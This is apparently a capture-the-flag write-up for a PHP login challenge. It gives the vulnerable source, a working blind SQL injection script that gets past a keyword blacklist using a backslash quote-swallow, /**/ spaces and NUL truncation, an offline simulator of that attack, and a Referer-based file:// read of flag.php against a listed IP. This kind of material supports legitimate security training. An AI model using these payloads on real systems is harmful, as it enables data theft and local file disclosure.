Opening the URL shows a login page. Submitting any username and password redirects to a page that displays the source, so this is a code-audit challenge. The source:

```php
<?php
include "config.php";
error_reporting(0);
highlight_file(__FILE__);
$check_list = "/into|load_file|0x|outfile|by|substr|base|echo|hex|mid|like|or|char|union|or|select|greatest|%00|_|\'|admin|limit|=_| |in|<|>|-|user|\.|\(\)|#|and|if|database|where|concat|insert|having|sleep/i";
if(preg_match($check_list, $_POST['username'])){
    die('<h1>Hacking first,then login!Username is very special.</h1>');
}
if(preg_match($check_list, $_POST['passwd'])){
    die('<h1>Hacking first,then login!No easy password.</h1>');
}
$query="select user from user where user='$_POST[username]' and passwd='$_POST[passwd]'";
$result = mysql_query($query);
$result = mysql_fetch_array($result);
$passwd = mysql_fetch_array(mysql_query("select passwd from user where user='admin'"));
if($result['user']){
    echo "<h1>Welcome to CTF Training!Please login as role of admin!</h1>";
}
if(($passwd['passwd'])&&($passwd['passwd'] === $_POST['passwd'])){
    $url = $_SERVER["HTTP_REFERER"];
    $parts = parse_url($url);
    if(empty($parts['host']) || $parts['host'] != 'localhost'){
        die('<h1>The website only can come from localhost!You are not admin!</h1>');
    }
    else{
        readfile($url);
    }
}
?>
```
The whole task is to get past the blacklist and inject into the first query. Both fields are interpolated unescaped, so a username of `\` swallows the closing quote of `user='...'` and the passwd field is parsed as SQL. The passwd then appends `||passwd regexp "^<prefix>"`, written with `/**/` in place of the blacklisted space, double quotes in place of the blacklisted single quote, and a real NUL byte (what `unquote` makes of `%00`) to cut off the trailing quote; the literal text `%00` would itself be caught by the blacklist. The "Welcome to CTF Training!" banner is printed whenever the query returns a row, which makes it a boolean oracle for whether a stored password starts with the guessed prefix. The injection script:

```python
# -*- coding:utf-8 -*-
import requests
from urllib.parse import unquote

url = 'http://47.102.127.194:8801/check.php'
char_set = '0123456789abcdefghijklmnopqrstuvwxyz_'
pw = ''
while True:
    for ch in char_set:
        # username "\" eats the closing quote of user='...', so the passwd
        # value is parsed as SQL: /**/ stands in for the blacklisted space,
        # double quotes for the blacklisted single quote, and unquote()
        # turns %00 into a real NUL byte that cuts off the trailing quote
        # (the literal text "%00" is itself blacklisted).
        payload = unquote('||passwd/**/regexp/**/"^' + pw + ch + '";%00')
        data = {"username": "\\", "passwd": payload}
        r = requests.post(url=url, data=data)
        # the banner appears only when a row comes back, i.e. the prefix matches
        if 'Welcome to CTF Training!' in r.text:
            pw += ch
            print(pw)
            break
    else:
        # nothing extended the prefix ('_' is blacklisted, so it never can):
        # the password is complete
        break
print('passwd:', pw)
```
The injection yields the password d0itr1ght. One caveat: MySQL's REGEXP on a non-binary column is case-insensitive, so the loop only recovers the lowercase form; the later `===` comparison is strict, so a password containing uppercase letters would have to be guessed with its case restored. Here the lowercase value is the real one.
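The following is an added example and is not code from the original writeup. It ports the PHP `$check_list` to Python so candidate payloads can be vetted offline before being sent, reproduces the query string the server builds, and runs the same prefix-by-prefix extraction against a constructed in-memory oracle that stands in for the MySQL backend, with a stopping rule the original loop lacks. The names `blocked`, `regexp_payload`, `build_query`, `make_oracle` and `extract` are chosen here, and the secret passwords are constructed test data.

```python
import re

# Port of the challenge's PHP $check_list (PCRE, /i) to Python so payloads
# can be checked offline before they are sent to the server.
CHECK_LIST = re.compile(
    r"into|load_file|0x|outfile|by|substr|base|echo|hex|mid|like|or|char|"
    r"union|or|select|greatest|%00|_|'|admin|limit|=_| |in|<|>|-|user|\.|"
    r"\(\)|#|and|if|database|where|concat|insert|having|sleep",
    re.IGNORECASE,
)

CHARSET = "0123456789abcdefghijklmnopqrstuvwxyz_"


def blocked(value: str) -> bool:
    """True if preg_match($check_list, $value) on the server would fire."""
    return CHECK_LIST.search(value) is not None


def regexp_payload(prefix: str) -> str:
    """The passwd field used by the extraction loop: '/**/' replaces the
    blacklisted space, double quotes replace the blacklisted single quote,
    and a real NUL byte (what urllib's unquote makes of %00) cuts off the
    rest of the query; the literal text '%00' would itself be blacklisted."""
    return '||passwd/**/regexp/**/"^' + prefix + '";\x00'


def build_query(username: str, passwd: str) -> str:
    """Reproduce the PHP interpolation exactly (no escaping happens)."""
    return f"select user from user where user='{username}' and passwd='{passwd}'"


def make_oracle(secret: str):
    """Constructed stand-in for the server (not a real MySQL). It applies the
    blacklist to both fields, then evaluates the injected condition the way
    MySQL would for username '\\': the backslash swallows the closing quote,
    so the WHERE clause degenerates to <string> || passwd REGEXP "^prefix".
    REGEXP on a non-binary column is case-insensitive, hence re.IGNORECASE."""
    body = re.compile(r'\|\|passwd/\*\*/regexp/\*\*/"\^([0-9a-z_]*)";\x00')

    def oracle(username: str, passwd: str) -> bool:
        if blocked(username) or blocked(passwd):
            return False          # die('Hacking first...'): no banner
        m = body.fullmatch(passwd)
        if username != "\\" or m is None:
            return False          # quotes intact: no row returned
        return re.match(m.group(1), secret, re.IGNORECASE) is not None

    return oracle


def extract(oracle, charset: str = CHARSET, max_len: int = 64) -> str:
    """The writeup's loop with a proper stopping rule: when no character
    extends the prefix (the '_' guess is always rejected by the blacklist,
    so it can never be a false positive) the password is complete. A secret
    whose next characters would form a blacklisted token such as 'or', 'in',
    'user' or '0x' stops the loop early, so a short result deserves a look."""
    pw = ""
    while len(pw) < max_len:
        for ch in charset:
            if oracle("\\", regexp_payload(pw + ch)):
                pw += ch
                break
        else:
            break
    return pw


if __name__ == "__main__":
    oracle = make_oracle("d0itr1ght")        # constructed secret
    print(repr(build_query("\\", regexp_payload("d0"))))
    print(extract(oracle))                    # d0itr1ght
```

Two things the simulation makes visible that the live loop does not: a secret spelled with uppercase letters is recovered in lowercase because REGEXP ignores case, and a secret containing a blacklisted token is truncated at that point because the server rejects the guess before the query ever runs.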
Then log in. The username cannot be admin (it is blacklisted), but it does not matter what it is: the file read is gated only on the submitted passwd being strictly equal to admin's stored password, so any username that passes the blacklist works. After that, `$_SERVER["HTTP_REFERER"]` is passed straight to `readfile()`, so it can read local files; the only condition is that `parse_url()` reports the host as `localhost`. A `file://` URL with `localhost` as the host satisfies that check and is opened by PHP's file wrapper:

```python
import requests

url = 'http://47.102.127.194:8801/check.php'
pw = 'd0itr1ght'
# The username only has to pass the blacklist; the file read is gated solely
# on passwd === admin's stored password. parse_url() of this Referer gives
# host 'localhost', and readfile() then opens the path via the file:// wrapper.
r = requests.post(url, data={"username": "1", "passwd": pw},
                  headers={"Referer": "file://localhost/var/www/html/flag.php"})
print(r.text)
```
flag{d0_1t_y0ur3elf}